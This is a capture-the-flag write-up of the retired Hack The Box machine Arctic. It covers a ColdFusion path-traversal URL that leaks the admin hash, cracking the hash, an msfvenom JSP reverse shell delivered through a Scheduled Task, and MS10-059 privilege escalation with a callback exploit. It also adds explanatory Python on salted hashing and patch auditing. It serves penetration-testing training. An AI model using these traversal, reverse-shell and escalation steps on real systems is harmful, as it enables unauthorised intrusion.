Keep Calm and Hack The Box - Arctic

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulate real-world scenarios and some of them lean more towards a CTF style of challenge.

Note. Only write-ups of retired HTB machines are allowed.

Arctic is a beginner-level machine, however the load times on the web server pose a few challenges for exploitation. Basic troubleshooting is required to get the correct exploit functioning properly.

We will use the following tools to pwn the box from a Kali Linux box:

  • nmap
  • Searchsploit
  • hash-identifier
  • MSFvenom
  • netcat
  • GDSSecurity/Windows-Exploit-Suggester
  • python http server
  • powershell

Step 1 - Reconnaissance

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as you can.

Ports scanning

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to perform an intensive scan:

nmap -A -v 10.10.10.11

-A: Enable OS detection, version detection, script scanning, and traceroute

-v: Increase verbosity level

10.10.10.11: IP address of the Arctic box

If you find the results a little bit too overwhelming, you can run another command to get only the open ports.

nmap 10.10.10.11

We can see that there are 3 open ports:

Port 135. Microsoft EPMAP (End Point Mapper), also known as DCE/RPC Locator service, used to remotely manage services including DHCP server, DNS server and WINS

Port 8500. Adobe ColdFusion built-in web server

Port 49154. Certificate Management over CMS

For now, Adobe ColdFusion, which is running on port 8500, will be the primary target.

Step 2 - Enumeration

Let's try port 8500 and visit http://10.10.10.11:8500

We can see two folders. I open the CFIDE folder.

It seems to be a web application with a ColdFusion administration panel at the following address:

10.10.10.11:8500/CFIDE/administrator/

For more information on ColdFusion, check here.

I use Searchsploit to check if there is any known vulnerability on ColdFusion. Searchsploit is a command line search tool for Exploit Database.

I use the following command:

searchsploit coldfusion

We can also find the exploit on the Exploit Database website:

I have a look at the description of the exploit:

and replace the server part with 10.10.10.11:8500:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

I can see that the hashed password is now visible on the page in between the inputs:

I use hash-identifier to identify the possible hash. hash-identifier is a tool that identifies the different types of hashes used to hash data, especially passwords. You can find more information here.

I launch hash-identifier with the following command:

hash-identifier

and copy/paste the hashed password I got earlier:

We see the hash is most likely to be a SHA-1.

Step 3 - Crack SHA-1 with hashtoolkit.com

I go to the website hashtoolkit to 'unhash' the hash. Hash functions are built so that it is very easy to generate a hash / fingerprint for a text, but almost impossible to decode the hash back to the original text.

It is important to note that hashing is a one-way mechanism. Thus the data that was hashed cannot practically be reversed or "unhashed".

The website is using rainbow tables for reversing cryptographic hash functions, usually for cracking password hashes. More info on the rainbow tables here.

I copy/paste the hash and get the password back: happyday.

You can also see the different hashes for this same password:

Currently the website has almost 17 billion decrypted MD5 and SHA1 password hashes:
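The reason a one-way hash could still be "unhashed" in seconds is that it was an unsalted SHA-1, so one precomputed table answers for every installation. The following is an added example (not from the original write-up or from hashtoolkit) that reproduces the identification and lookup on a constructed mini wordlist, then shows the defence: a random per-record salt plus a slow KDF, which makes such a table useless.

```python
import hashlib
import hmac
import os
import re

# Length/charset based guess in the spirit of hash-identifier (assumption:
# only unsalted hex digests are considered, so 40 hex chars => SHA-1).
HEX_DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}

def identify_hash(digest: str) -> str:
    digest = digest.strip()
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return "unknown"
    return HEX_DIGEST_LENGTHS.get(len(digest), "unknown")

def sha1_hex(text: str) -> str:
    return hashlib.sha1(text.encode()).hexdigest()

# Constructed mini wordlist; hashtoolkit's 17 billion entries are the same
# idea at scale. 'happyday' is the password recovered in the article.
WORDLIST = ["password", "123456", "happyday", "letmein", "coldfusion"]

def build_lookup_table(wordlist) -> dict:
    """Precompute digest -> plaintext once. Because the ColdFusion hash is
    unsalted, one table answers for every installation that used it."""
    return {sha1_hex(word): word for word in wordlist}

def lookup(digest: str, table: dict):
    return table.get(digest.strip().lower())

# The defence: a random per-record salt plus a slow KDF, so a precomputed
# table is useless and each guess costs `iterations` work per record.
def pbkdf2_record(password: str, iterations: int = 200_000) -> str:
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def pbkdf2_verify(password: str, record: str) -> bool:
    _algo, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    leaked = sha1_hex("happyday")  # stands in for the hash leaked above
    print(identify_hash(leaked), "->", lookup(leaked, table))
    record = pbkdf2_record("happyday")
    print("salted record found in table?", lookup(record, table) is not None)
    print("verify happyday:", pbkdf2_verify("happyday", record))
```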

Step 4 - Create a Scheduled Task

I use the password to log into the portal:

I can see an area on the left sidebar that should allow uploads via Scheduled Tasks under the Debugging & Logging category:

I can create a new task:

On the page, I will have to set up the task with the different parameters:

I check the Mappings to see the CFIDE path - one of the two folders we found at the beginning - and know where I can save the shell:

I will use msfvenom, which is a payload generator, to craft the exploit - and more specifically a jsp reverse shell. This piece of information was collected during the recon phase - looking at the Wikipedia page of ColdFusion, we can see it is written in Java:

You can learn more about msfvenom here.

I use the following command to create the payload:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.51 LPORT=443 -f raw > arcticshell.jsp

-p: Payload to use

-f: Output format

LHOST: Local host

LPORT: Local port

I saved the exploit as arcticshell.jsp. I can see the content of the payload with the following command:

cat arcticshell.jsp

Let's fire up a Python server to serve the file from Kali. I will use SimpleHTTPServer. The SimpleHTTPServer module that comes with Python is a simple HTTP server that provides standard GET and HEAD request handlers. You can learn more on that here.

I use the following command to create a simple server:

python -m SimpleHTTPServer 80

Back to the ColdFusion panel, I configure the following parameters for the Scheduled Task.

First I set the URL to our web server, which is hosting the shell we created with msfvenom:

http://10.10.14.51/arcticshell.jsp

Then I check the box to save the output to a file.

Finally I set the file to the following path:

C:\ColdFusion8\wwwroot\CFIDE\arcticshell.jsp

Here is what I have when I finish setting all the parameters:

Under the Actions on the left side, I click on the first button to run the task. I can see a green message at the top of the page letting me know the scheduled task was completed successfully:

I can also see a 200 response on my python http server:

I set up a Ncat listener on port 443 to catch the reverse shell connection.

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users.

You can learn more about Ncat here.

I then browse to the shell at:

http://10.10.10.11:8500/CFIDE/arcticshell.jsp

I finally got a shell!

Step 5 - Looking for the user.txt flag

I check who I am on the machine with the command

whoami

I list the files/folders with

dir

I navigate to Users

Then I move to the tolis folder

I navigate to the Desktop

And I find the user.txt file!

To read the content of the file I use the command

more user.txt

Step 6 - Using GDSSecurity/Windows-Exploit-Suggester

I look at the system information with the command

systeminfo

I copy/paste the findings into a systeminfo.txt file:

I will use Windows-Exploit-Suggester from GDSSecurity:

This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
It requires the 'systeminfo' command output from a Windows host in order to compare it against the Microsoft security bulletin database and determine the patch level of the host.
It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.

I copy/paste the raw windows-exploit-suggester python script into a file. I open the file with

nano windows-exploit-suggester.py

and paste the code from the GitHub repository. We now have our 2 files in the same folder, systeminfo.txt and windows-exploit-suggester.py:

I can find out more about this tool with the following command:

python windows-exploit-suggester.py -h

I update the database of the tool with the following command:

python windows-exploit-suggester.py --update

I run the script with

python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2020-02-25-mssb.xls

If you run into an error, you will need to install pip before installing xlrd. You can install pip on Kali with the following command:

apt install python-pip

Then you can install xlrd with the command

pip install xlrd

I can see that there are several missing CVEs on this machine. I will target the MS10-059 vulnerability:
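The core of what Windows-Exploit-Suggester does is a patch-level audit: parse the systeminfo output, collect the installed KBs, and report bulletins that apply to the OS but whose fix is absent. The following is an added example in miniature (my own code, not that project's); the systeminfo text and the bulletin table are constructed, and apart from MS10-059, which the write-up goes on to use, every bulletin and KB number is a placeholder.

```python
import re

# Constructed, abbreviated systeminfo output in the real command's layout.
# OS fields and KB numbers are sample values, not the box's real ones.
SAMPLE_SYSTEMINFO = """\
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed table: bulletin -> (OS-name substring it applies to, fixing KB).
# MS10-059 is the bulletin named in the article; everything else is made up.
BULLETINS = {
    "MS10-059": ("Windows Server 2008 R2", "KB0000010"),       # not installed
    "PLACEHOLDER-A": ("Windows Server 2008 R2", "KB0000001"),  # installed
    "PLACEHOLDER-B": ("Windows 7", "KB0000020"),               # other OS
}

KEY_VALUE_RE = re.compile(r"^(\S[^:]*):\s*(.*)$")  # unindented 'Key: value'
KB_RE = re.compile(r"\bKB\d+\b")

def parse_systeminfo(text: str) -> dict:
    """Extract OS name/version and the set of installed KBs. Continuation
    lines are indented, so KBs are only collected inside the Hotfix(s) block."""
    info = {"os_name": "", "os_version": "", "hotfixes": set()}
    in_hotfix_block = False
    for line in text.splitlines():
        m = KEY_VALUE_RE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            in_hotfix_block = key.startswith("Hotfix")
            if key == "OS Name":
                info["os_name"] = value
            elif key == "OS Version":
                info["os_version"] = value
        elif in_hotfix_block:
            kb = KB_RE.search(line)
            if kb:
                info["hotfixes"].add(kb.group(0))
    return info

def missing_bulletins(info: dict, bulletins: dict) -> list:
    """Bulletins that apply to this OS and whose fixing KB is not installed."""
    return sorted(name for name, (os_match, kb) in bulletins.items()
                  if os_match in info["os_name"] and kb not in info["hotfixes"])
```

Running `missing_bulletins(parse_systeminfo(SAMPLE_SYSTEMINFO), BULLETINS)` on the constructed data reports only MS10-059, the same kind of result the real tool produced for this box.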

Step 7 - Performing privilege escalation

I look at the Microsoft website to get more information from their Security Bulletin:

I have a look at the Exploit Database:

I also have a look at the National Vulnerability Database. More info on NVD here.

I find an executable on GitHub here that I can download. The exploit will create a reverse shell.

I create a new python http server with

python -m SimpleHTTPServer 80

Back to the shell where I got the user flag, I set up a WebClient with the URL of the exploit and the file where the exploit will be saved:

I'm getting a 200 on the python http server:

I set up a new netcat listener and launch the exploit with the following command:

exploit.exe 10.10.14.20 443

Step 8 - Looking for the root.txt flag

I can see that the privilege escalation was a success by checking who I am on the machine:

whoami

It returns

nt authority\system

I am admin:

I navigate to Users:

I move to the Administrator folder:

I navigate to the Desktop folder:

I can see the root.txt flag!

I use the following command to see the content of the file:

more root.txt

Congrats! You found both flags!

Please don't hesitate to comment, ask questions or share with your friends :)

You can see more of my articles here

You can follow me on Twitter or on LinkedIn

And don't forget to #GetSecure, #BeSecure & #StaySecure!

Other Hack The Box articles

Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-arctic/
